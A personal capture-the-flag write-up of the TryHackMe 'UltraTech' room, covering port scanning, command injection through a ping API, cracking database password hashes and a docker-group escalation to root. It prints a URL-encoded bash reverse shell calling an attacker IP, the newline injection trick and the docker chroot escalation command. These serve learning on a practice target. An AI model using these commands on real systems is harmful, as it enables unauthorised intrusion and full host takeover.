UltraTech - wook413

#tryhackme #linux #writeup ![[Pasted image 20250703221800.png]] --- # Information Gathering - Nmap I performed a TCP port scan against all 65,535 ports and 4 open ports found. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop/vpn] └─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p- [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-02 20:46 CDT Nmap scan report for 10.10.63.141 Host is up (0.13s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 8081/tcp open blackice-icecap 31331/tcp open unknown ``` I then performed a more detailed TCP port scan against those 4 ports found using scripts. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop/vpn] └─$ nmap -sC -sV $IP -p 21,22,8081,31331 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-02 20:50 CDT Nmap scan report for 10.10.63.141 Host is up (0.13s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 dc:66:89:85:e7:05:c2:a5:da:7f:01:20:3a:13:fc:27 (RSA) | 256 c3:67:dd:26:fa:0c:56:92:f3:5b:a0:b3:8d:6d:20:ab (ECDSA) |_ 256 11:9b:5a:d6:ff:2f:e4:49:d2:b5:17:36:0e:2f:1d:2f (ED25519) 8081/tcp open http Node.js Express framework |_http-cors: HEAD GET POST PUT DELETE PATCH |_http-title: Site doesn't have a title (text/html; charset=utf-8). 31331/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: UltraTech - The best of technology (AI, FinTech, Big Data) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.47 seconds ``` Then finally, a UDP scan against top 1,000 ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop/vpn] └─$ nmap -sU $IP --min-rate 3000 --top-ports 1000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-02 20:52 CDT Nmap scan report for 10.10.63.141 Host is up (0.13s latency). Not shown: 994 open|filtered udp ports (no-response) PORT STATE SERVICE 1718/udp closed h225gatedisc 16832/udp closed unknown 19935/udp closed unknown 21354/udp closed unknown 28122/udp closed unknown 49211/udp closed unknown Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds ``` --- # Footprinting This is what the landing page looks like for the port `8081`. ![[Pasted image 20250702210845.png]] `gobuster` reveals there's `/auth` directory. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ gobuster dir -u http://$IP:8081 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.63.141:8081 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /auth (Status: 200) [Size: 39] /ping (Status: 500) [Size: 1094] ``` `/auth` page informs us that we need to specify a `login` and a `password`. ![[Pasted image 20250702211032.png]] This is what the landing page looks like on the port `31331`. ![[Pasted image 20250702211302.png]] I browsed its `/robot.txt` file and it revealed the sitemap `/utech_sitemap.txt` ![[Pasted image 20250702210524.png]] `/utech_sitemap.txt` revealed 3 `.html` files: `index.html`, `what.html`, and `partners.html` ![[Pasted image 20250702211455.png]] I browsed all 3 and `/partners.html` instantly stood out because it mentions a "Private Partners Area" and contains a login form where we could potentially try different credential-based attacks. ![[Pasted image 20250702211740.png]] I tried `admin:admin` on the login form and it said "invalid credentials". Trying to log in reveals that the form sends login requests to port `8081` (`/auth` endpoint). ![[Pasted image 20250702212153.png]] I checked the source code of `/partners.html` and `/api.js` stood out to me. `/api.js` contains both `/api` and `/ping` that we had seen from the output of `gobuster`. ![[Pasted image 20250703203525.png]] ![[Pasted image 20250703203540.png]] I followed the same exact format written in `/api.js` in the browser and it displayed the result of ping. ![[Pasted image 20250703204435.png]] I appended `%0A` which represents encoded `\n` (newline) and `ls` and it actually listed files which indicates it's vulnerable to command injection. ![[Pasted image 20250703205135.png]] `cat utech.db.sqlite` reveals credentials stored in the db. ![[Pasted image 20250703205456.png]] I'm not exactly sure why there's an extra string `M` in the front, but I don't think that's part of the usernames. ```plaintext tableusersusersCREATE TABLE users (login Varchar, password Varchar, type Int) (Mr00tf357a0c52799563c7c7b76c1e7543a32)Madmin0d0ea5111e3c1def594c1684e3b9be84 ``` r00t:`f357a0c52799563c7c7b76c1e7543a32` admin:`0d0ea5111e3c1def594c1684e3b9be84` password hash cracked! Now let's try these credentials on the login form. ![[Pasted image 20250703205911.png]] `r00t:n100906` got me successfully logged in and it's telling `r00t` to take a look at the server's configuration. Now let's try `admin` this time. ![[Pasted image 20250703210112.png]] Successfully logged in with `admin:mrsheafy`. Interestingly, the credentials navigated me to what appears to be the exact same page. ![[Pasted image 20250703210409.png]] At this point, I wanted to get a reverse shell so I tried the URL encoded payload below. However, it appears to be connected for a split second and immediately gets disconnected. ```bash bash+-c+'bash+-i+>%26+/dev/tcp/10.23.133.183/1234+0>%261' ``` ![[Pasted image 20250703212546.png]] I tried prepend `nohup` and everything but it kept disconnected. Then I remembered to use those credentials against FTP or SSH and.... I got in haha ![[Pasted image 20250703213752.png]] # Privilege Escalation The command `id` revealed that `r00t` user belongs to `docker` group. ```bash r00t@ultratech-prod:/$ id uid=1001(r00t) gid=1001(r00t) groups=1001(r00t),116(docker) ``` Being part of the `docker` group is a very serious privilege. It means that any user in the group can control the Docker daemon without root privileges. In other words, users can create or modify Docker containers at will, and even escalate their privileges to the host operating system. With the command below, we can easily escalate our privileges to the host OS. ```bash docker run -v /:/mnt --rm -it <docker image> chroot /mnt sh ``` This command above runs a Docker container and mounts the entire file system of the host machine (`/`) into the container at the `/mnt` directory. By using `chroot /mnt sh`, the container changes its root directory to the host's file system, effectively giving the user access to the host operating system from inside the container. I checked what docker images are available locally and there was only one, `bash`. Then I ran the command to get a shell as root. ```bash r00t@ultratech-prod:/$ docker images REPOSITORY TAG IMAGE ID CREATED SIZE bash latest 495d6437fc1e 6 years ago 15.8MB r00t@ultratech-prod:/$ docker run -v /:/mnt --rm -it bash chroot /mnt sh # whoami root ```